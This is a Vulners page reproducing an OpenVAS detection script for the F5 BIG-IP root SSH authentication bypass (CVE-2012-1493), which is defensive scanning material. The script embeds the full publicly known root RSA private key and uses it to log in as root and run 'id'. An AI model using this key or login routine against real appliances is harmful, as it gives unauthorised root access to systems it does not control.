Vulners
Lucene search
F5 BIG-IP remote root authentication bypass Vulnerability
🗓️ 14 Jun 2012 00:00:00Reported by This script is Copyright (C) 2012 Greenbone Networks GmbHType 
openvas🔗 plugins.openvas.org👁 131 Views
| Reporter | Title | Published | Views | Family All 27 |
|---|---|---|---|---|
 | F5 BIG-IP Remote Root Authentication Bypass Vulnerability | 11 Jun 201200:00 | – | zdt |
| F5 BIG-IP SSH Private Key Exposure | 13 Jun 201200:00 | – | zdt |
 | CVE-2012-1493 | 11 Jun 201200:00 | – | circl |
 | CVE-2012-1493 | 9 Jul 201222:00 | – | cve |
 | CVE-2012-1493 | 9 Jul 201222:00 | – | cvelist |
 | F5 BIG-IP - Authentication Bypass (PoC) | 11 Jun 201200:00 | – | exploitdb |
| F5 BIG-IP - SSH Private Key Exposure (Metasploit) | 13 Jun 201200:00 | – | exploitdb |
 | F5 BIG-IP - Authentication Bypass (PoC) | 11 Jun 201200:00 | – | exploitpack |
 | F5 Multiple Products Root Authentication Bypass | 13 Jun 201200:00 | – | nessus |
| SSH Static Key Accepted | 8 May 201400:00 | – | nessus |
10
###############################################################################
# OpenVAS Vulnerability Test
# $Id: gb_f5_bigip_ssh_root_auth_bypass.nasl 5963 2017-04-18 09:02:14Z teissa $
#
# F5 BIG-IP remote root authentication bypass Vulnerability
#
# Authors:
# Michael Meyer <[email protected]>
#
# Copyright:
# Copyright (c) 2012 Greenbone Networks GmbH
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
tag_summary = "A platform-specific remote root access vulnerability has been discovered that may
allow a remote user to gain privileged access to affected systems using SSH.
The vulnerability is caused by a publicly known SSH private key for the root user
which is present on all vulnerable appliances.
The following platforms are affected by this issue:
VIPRION B2100, B4100, and B4200
BIG-IP 520, 540, 1000, 2000, 2400, 5000, 5100, 1600, 3600, 3900, 6900, 8900, 8950, 11000, and 11050
BIG-IP Virtual Edition
Enterprise Manager 3000 and 4000";
tag_solution = "Updates are available. See the References for more information.";
if (description)
{
script_id(103494);
script_version ("$Revision: 5963 $");
script_bugtraq_id(53897);
script_name("F5 BIG-IP remote root authentication bypass Vulnerability");
script_cve_id("CVE-2012-1493");
script_tag(name:"cvss_base", value:"7.8");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:N/A:N");
script_xref(name : "URL" , value : "https://www.trustmatta.com/advisories/MATTA-2012-002.txt");
script_xref(name : "URL" , value : "http://support.f5.com/kb/en-us/solutions/public/13000/600/sol13600.html");
script_tag(name:"last_modification", value:"$Date: 2017-04-18 11:02:14 +0200 (Tue, 18 Apr 2017) $");
script_tag(name:"creation_date", value:"2012-06-14 13:35:33 +0200 (Thu, 14 Jun 2012)");
script_category(ACT_ATTACK);
script_tag(name:"qod_type", value:"remote_vul");
script_family("Gain a shell remotely");
script_copyright("This script is Copyright (C) 2012 Greenbone Networks GmbH");
script_dependencies("ssh_detect.nasl");
script_require_ports("Services/ssh", 22);
script_tag(name : "solution" , value : tag_solution);
script_tag(name : "summary" , value : tag_summary);
exit(0);
}
include("ssh_func.inc");
port = get_kb_item("Services/ssh");
if(!port) port = 22;
if(!get_port_state(port))exit(0);
if(!soc = open_sock_tcp(port))exit(0);
login = 'root';
priv ='-----BEGIN RSA PRIVATE KEY-----
MIICWgIBAAKBgQC8iELmyRPPHIeJ//uLLfKHG4rr84HXeGM+quySiCRgWtxbw4rh
UlP7n4XHvB3ixAKdWfys2pqHD/Hqx9w4wMj9e+fjIpTi3xOdh/YylRWvid3Pf0vk
OzWftKLWbay5Q3FZsq/nwjz40yGW3YhOtpK5NTQ0bKZY5zz4s2L4wdd0uQIBIwKB
gBWL6mOEsc6G6uszMrDSDRbBUbSQ26OYuuKXMPrNuwOynNdJjDcCGDoDmkK2adDF
8auVQXLXJ5poOOeh0AZ8br2vnk3hZd9mnF+uyDB3PO/tqpXOrpzSyuITy5LJZBBv
7r7kqhyBs0vuSdL/D+i1DHYf0nv2Ps4aspoBVumuQid7AkEA+tD3RDashPmoQJvM
2oWS7PO6ljUVXszuhHdUOaFtx60ZOg0OVwnh+NBbbszGpsOwwEE+OqrKMTZjYg3s
37+x/wJBAMBtwmoi05hBsA4Cvac66T1Vdhie8qf5dwL2PdHfu6hbOifSX/xSPnVL
RTbwU9+h/t6BOYdWA0xr0cWcjy1U6UcCQQDBfKF9w8bqPO+CTE2SoY6ZiNHEVNX4
rLf/ycShfIfjLcMA5YAXQiNZisow5xznC/1hHGM0kmF2a8kCf8VcJio5AkBi9p5/
uiOtY5xe+hhkofRLbce05AfEGeVvPM9V/gi8+7eCMa209xjOm70yMnRHIBys8gBU
Ot0f/O+KM0JR0+WvAkAskPvTXevY5wkp5mYXMBlUqEd7R3vGBV/qp4BldW5l0N4G
LesWvIh6+moTbFuPRoQnGO2P6D7Q5sPPqgqyefZS
-----END RSA PRIVATE KEY-----';
pub = 'AAAAB3NzaC1yc2EAAAABIwAAAIEAvIhC5skTzxyHif/7iy3yhxuK6/OB13hjPqrskogkYFrcW8OK4VJT+5+Fx7wd4sQCnVn8rNqahw/x6sfcOMDI/Xvn4yKU4t8TnYf2MpUVr4ndz39L5Ds1n7Si1m2suUNxWbKv58I8+NMhlt2ITraSuTU0NGymWOc8+LNi+MHXdLk=';
login = ssh_login (socket:soc, login:login, password:NULL, pub:pub, priv:priv, passphrase:NULL);
if(login == 0) {
cmd = ssh_cmd(socket:soc, cmd:"id");
if("uid=" >< cmd) {
security_message(port:port);
close(soc);
exit(0);
}
}
close(soc);
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
18 Apr 2017 00:00Current
0.4Low risk
Vulners AI Score0.4
EPSS0.63078